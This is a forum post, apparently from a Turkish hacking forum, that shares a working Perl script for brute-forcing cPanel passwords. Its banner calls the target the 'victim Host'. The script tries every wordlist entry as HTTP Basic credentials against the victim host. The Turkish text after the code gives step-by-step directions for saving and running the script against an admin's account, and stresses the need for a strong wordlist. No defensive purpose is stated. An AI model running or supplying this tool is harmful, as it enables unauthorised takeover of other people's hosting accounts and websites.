Cpanel Password Brute Force TooL ( perL expLoiT )

[Sorcex]

Kod:

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
#    (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
 
$host     = $ARGV[0];
$user     = $ARGV[1];
$port     = $ARGV[2];
$list     = $ARGV[3];
$file     = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
#               Cpanel Password Brute Force Tool              #
###############################################################
#     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    #
#-------------------------------------------------------------#
#    [Host] : victim Host             (simorgh-ev.com)        #
#    [User] : User Name               (demo)                  #
#    [PORT] : Port of Cpanel          (2082)                  #
#[list] : File Of password list   (list.txt)              #
#    [File] : file for save password  (password.txt)          #
#                                                             #
###############################################################
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);exit;}
 
headx();
 
$numstart  = "-1";
 
sub headx() {
print q(
###############################################################
#              Cpanel Password Brute Force Tool               #
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
 [~] Try Password : $passwd 
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
 [-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close
 
";
read  $sock, $answer, 128;
close($sock);
 
if ($answer =~ /Moved/) {
print "
 [~] PASSWORD FOUND : $passwd 
";
exit();
}
}

GErÇekten Perl dilinde yazıLmışh Cok GuzeL bir expLoit ARkAdasLar Brute Force yaparak admin şifresini bulmanızı sağLıor taBi eLinizde SağLam bir WordListiniz oLmalı.

Nese ben exploitten biraz bahsedeyim arkadaslar exploit derlemeyi biliorsunuzdur umarım
bilmeyenler için
öNceLikLe exploit KoduMuzu kOpyaLıoruz ve not defterine yapıstırıorus sonrasında exploitimize bir isim verelim ben "cp" ismini verdim


ve cp.pl seklinde kaydedioruz..uzantısı "pl" olucak buna dikkat edelim cunqi perl dilinde yazıLmısh 1 exploit...
sonrasında exploitimizi C:\Perl\bin'klasörünün içerisine kaydedioruz..Daha sonra saĞlam bir w0rd LiSt oLuştuRuoruz we onuda aynı $ekhiLde..C:\Perl\bin' klasörünün içHeriSine KaydediRuz..
we Ms-Dos'a gelioruz..


C:\********s and Settings\Administrator>cd..

C:\********s and Settings\Administrator>cd..

C:\>cd perl

C:\Perl>cd bin

C:\Perl\bin>perl cp.pl

C:\Perl\bin>perl cp.pl [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] adminnicki 2082 wordlistimiz.txt password.txt

yaptıgımızda hazırlamı$h oLduĞumuz wordListimiz dEwReyE giRiy0r sırasıyla wordListteki tüm $ifreLeri denior..
adminin nickine barak password.txt'deki admin şifresi ile word Listimizdeki şifreLeri SıRaSıyLa karsılastırıor..egerki adminin şifresi word LiStiMizde yer almaktaysa ne mutlu bize..
o yuzden arkda$hLar sağLam bir w0rd Liste ihtiyaCıNız var..